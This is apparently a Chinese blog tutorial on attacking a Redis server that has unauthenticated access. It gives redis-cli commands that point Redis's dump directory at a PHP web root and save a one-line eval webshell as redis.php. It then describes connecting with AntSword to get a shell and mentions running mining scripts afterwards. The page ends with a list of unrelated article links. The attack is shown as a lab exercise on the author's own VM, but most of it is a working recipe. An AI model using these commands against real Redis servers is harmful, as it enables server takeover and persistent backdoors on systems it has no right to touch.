当前位置: 首页 > news >正文

【Redis攻击】

​攻击原理基础​

​前提条件​​:Redis 服务存在​​未授权访问​​漏洞(无密码或弱密码,且绑定在公网或内网敏感IP上)。

​核心漏洞​​:攻击者可以连接上 Redis,并命令其将特定内容​​持久化到服务器磁盘的任意位置​​。

Webshell 提权案例​

​攻击目标​​:获取网站服务器的控制权。

操作步骤​​:

前提操作在CenTos上配置了redis,并且配置好了phpstudy。进入服务端

#端口:6379
cd /home/centos/redis-6.2.5/src/
./redis-server
#或
./redis-server redis.conf
#开启另外一个终端
# 进入交互模式
./redis-cli

写入一句话木马脚本放在该路径phpstudy下

[root@localhost src]# ./redis-cli
127.0.0.1:6379> config set dir /www/admin/localhost_80/wwwroot
OK
127.0.0.1:6379> config get dir
1) "dir"
2) "/www/admin/localhost_80/wwwroot"127.0.0.1:6379> config set dbfilename "redis.php"
OK
127.0.0.1:6379> set aaa bbb 
OK
127.0.0.1:6379> set ddd eee
OK
127.0.0.1:6379> save
OK
127.0.0.1:6379> save
OK
127.0.0.1:6379> flushall
OK
127.0.0.1:6379> save
OK
127.0.0.1:6379> set x " <?php @eval($_POST[wuya]);?>"
OK
127.0.0.1:6379> save
OK

可以先查看一下在该路径下是否有生成redis.php文件访问网址:虚拟机ip+文件名。可以读取但是存在乱码,不用管

  • 打开hackbar发现输入命令没反应,换个测试方法,用蚁剑连接

连接成功的标志意味着我们可以控制虚拟服务器,右键数据条打开虚拟终端,输入ipconfig可以看到跟执行木马到虚拟机的ip输出一样,意味着就可以执行挖矿脚本等一系列攻击了

http://www.dtcms.com/a/525938.html

相关文章:

  • 企业建站团队网站建设的文字用什么字体较好
  • 在 PowerShell 中安装 Chocolatey,并使用 Chocolatey 更新 Dapr
  • 用FastAPI封装Qwen云端API,本机Postman测试,再用Django做前端界面调用
  • 网站源码做exe执行程序开发公司交钥匙流程
  • gooood谷德设计网站咸宁网站开发
  • 企业电商网站备案流程苏州做网站哪家专业
  • 可信网站认证必须做井研移动网站建设
  • 网站后台登陆密码破解网站建设 推神网络
  • 免费做字体的网站好广告网站建设案例
  • 高电压技术:水分在普通气压和高气压条件下--对击穿电压的影响
  • 2021好心人给个开车的网站珠海市建设局官方网站
  • 如何更好地指挥语言大模型给自己干活
  • 如何设计通用 ATS 代理销售激励系统(从业务到架构的通盘思考)
  • 灯具公司网站模板做360手机网站快
  • 网站免费维护期是多少.net 做手机网站吗
  • 工控主机做网站服务器宁夏住房和城乡建设官方网站
  • 广州seo网站营销网站安全 维护
  • Python 类的用法
  • 零钱通项目
  • 网站如何做免费推广商业网站开发入门
  • 怎样制作表白网站如何用c语言做网站
  • C++——多态——应试重点
  • 中国建筑网建设通网站怎么建网站卖产品
  • 用phpstrom 调试 webman
  • 杭州自助建站软件网页设计素材网站有哪些
  • 网站建设设计公司类网站织梦模板(带手机端)嘉兴市城乡规划建设局网站
  • 苏州网站制作出名 乐云践新商务网站开发综合实训
  • 品牌餐饮加盟网站建设整体vi设计公司
  • 个人怎样申请网站宁波网页设计
  • 南京网站定制wordpress和帝国